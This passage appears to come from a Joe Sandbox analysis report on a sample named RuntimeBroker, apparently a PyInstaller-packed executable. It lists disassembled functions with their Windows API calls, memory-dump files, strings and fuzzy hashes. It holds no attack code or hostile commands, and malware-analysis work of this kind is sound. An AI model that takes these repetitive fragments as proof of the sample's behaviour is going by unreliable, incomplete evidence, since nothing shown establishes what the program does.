                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B696A
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B69B0
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FFE0C0B6A6B,?,?,00000000,00007FFE0C0B689C,?,?,?,?,00007FFE0C0B65E5), ref: 00007FFE0C0B69BC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                • API String ID: 916704608-2084034818
                                                                                                                                                                                • Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                                                                                                                                                • Instruction ID: 72f70a8a7a6636275a9b23daeeda2728b5cd4027277bbcbee467418ad79460ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B31D831B5A74291EF15DB0AA8202B96399BF04BA0F194535EE2D073B5EF3DE544C348
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abort$AdjustPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1501936508-0
                                                                                                                                                                                • Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                                                                                                                                                • Instruction ID: 131cb8b24acaf85725b8bd7c8d698878c6b6394e9ddbd07c041d8abb08ae6094
                                                                                                                                                                                • Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A518E31E8AA4381EA69DB5D946463C67A7AF45FC0F098439DF4D0A7A5DF2CE442C308
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: abort$AdjustPointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1501936508-0
                                                                                                                                                                                • Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                                                                                                                                                • Instruction ID: 36782dea1efc9f762d9f2388eb3e0e03b1d0b2f4ecb6dc1c1b96d71f32f7b33a
                                                                                                                                                                                • Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5F519D31ACAA4381EA66DB1D95A463C63A7AF54F84F058435CF4E067B6DF2CE942C30C
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileHeader_local_unwind
                                                                                                                                                                                • String ID: MOC$RCC$csm$csm
                                                                                                                                                                                • API String ID: 2627209546-1441736206
                                                                                                                                                                                • Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                                                                                                                                                • Instruction ID: 8c5b04e6970523ec1f2c07a43ddba52a51408a9b5d935cbb4ae2839e7f8c2ba2
                                                                                                                                                                                • Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                                                                                                                                                • Instruction Fuzzy Hash: E4518B76E8961286EB60DF2D986137D66A6FF84B94F140072EB4C533A5DF3CE481CB09
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: NameName::atol
                                                                                                                                                                                • String ID: `template-parameter$void
                                                                                                                                                                                • API String ID: 2130343216-4057429177
                                                                                                                                                                                • Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                                                                                                                                                • Instruction ID: 5ef338db981301da02af28bb0517bffe851abe3b203adc443527a9c31f2f0f71
                                                                                                                                                                                • Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                                                                                                                                                • Instruction Fuzzy Hash: 04411862F88B5688FB10DBA9D8A12FC63B2BF48B84F941135DE0D16A69DF7CE505C344
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D06D
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D07B
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D0A5
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D113
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D11F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                • Instruction ID: df023e2298bdeeb8481cb12f4e837c6c823218dad9533ba20b80511e0983d0da
                                                                                                                                                                                • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E31932161A646D1EE33BB5AAC54B79A394FF04B60FD91636DD1D07B60EE3CE4428B30
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                • API String ID: 2943138195-2211150622
                                                                                                                                                                                • Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                                                                                                                                                • Instruction ID: c37ed0d0b8a35bcf75f59a8506a6b90ef57c473748e3fc62884b759a3b0835e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 02413A72A98B4698FB11CB2CD8901AC37AABF08708F548235EB4D127B4DF3CD545C758
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Name::operator+
                                                                                                                                                                                • String ID: char $int $long $short $unsigned
                                                                                                                                                                                • API String ID: 2943138195-3894466517
                                                                                                                                                                                • Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                                                                                                                                                • Instruction ID: 4f0223a6f7ded88ed40b1865c3701de4ad251f5de733f901ae35290b07402101
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                                                                                                                                                • Instruction Fuzzy Hash: D8416572F9C65289EB11CF6CD8A41BC37A2BF08B04F448031EA4C12B68DF3CA544D718
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                • Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                                • Instruction ID: c9caa850fbb6db86d4d85963d6896311a1b9c58241e0d985abbae8873a59b300
                                                                                                                                                                                • Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                                                                                                • Instruction Fuzzy Hash: 77215331A0CA4242EB31AB59A89423AE7A1FF857E4F900235DA6D43AF5DF7CE4449B10
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                • Instruction ID: cb6f89516d80d5f9613f13bc08ebc82a260d38583f06ac38178ceab5761d2cf3
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                • Instruction Fuzzy Hash: 16210E20B0825242FA7B732E5D99179E182DF8C7B0F944638D93E06AF6DD2CE4414E21
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorFormatLast
                                                                                                                                                                                • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                • API String ID: 3971115935-1149178304
                                                                                                                                                                                • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                • Instruction ID: 4e961df43b03e01fffc5692f8d0dcd4e38debf4df37a838c4ccefed7076a9077
                                                                                                                                                                                • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D212372618A8582E731AB14F8546EAF364FB88784F804136EBCD53AA8DF7CD545CF50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                • Instruction ID: 48a4d459991f99ea64e03fd754b3860bcf394cf5b6e836a4b0acdd0f1642a9d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                • Instruction Fuzzy Hash: B5118431B18A4186E7619B5AEC54335E3A0FB58BE4F804234DA1D477B4DF3CE504CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05821D
                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05827A
                                                                                                                                                                                  • Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9
                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058305
                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058364
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058375
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05838A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                • Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                                • Instruction ID: cac5786549ca903f74ed64aa25f920d8e82d03e6fc1201d8e18ba49ae5b43b79
                                                                                                                                                                                • Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A41B372A1978641EB31AF19A8802BAB394FF84B84F844035DF9C57BA9DE3CE401CF14
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3741236498-0
                                                                                                                                                                                • Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                                                                                                                                                • Instruction ID: 964d72f39db285a3e6ba7d1009f18e3c23f005f8daa4c1e0e9f450d702625ebd
                                                                                                                                                                                • Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                                                                                                                                                • Instruction Fuzzy Hash: C831D322B59B5190EB19CF2AA85456933A1FF09FD4B594635EF2D033A0EF3ED452C304
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetCurrentProcess.KERNEL32 ref: 00007FF72B057B70
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: OpenProcessToken.ADVAPI32 ref: 00007FF72B057B83
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetTokenInformation.ADVAPI32 ref: 00007FF72B057BA8
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetLastError.KERNEL32 ref: 00007FF72B057BB2
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: GetTokenInformation.ADVAPI32 ref: 00007FF72B057BF2
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B057C0E
                                                                                                                                                                                  • Part of subcall function 00007FF72B057B50: CloseHandle.KERNEL32 ref: 00007FF72B057C26
                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B05848C
                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF72B053814), ref: 00007FF72B058495
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                • Instruction ID: ba575d771b70e856a571d81c72c269d89e6245f365fd0fd7f31ccbc91f0e098f
                                                                                                                                                                                • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                • Instruction Fuzzy Hash: F2212B61A0864681F662BB18EC553FAA2A0FB88780FC44435EA4D53BA6DE3CE545CB60
                                                                                                                                                                                APIs
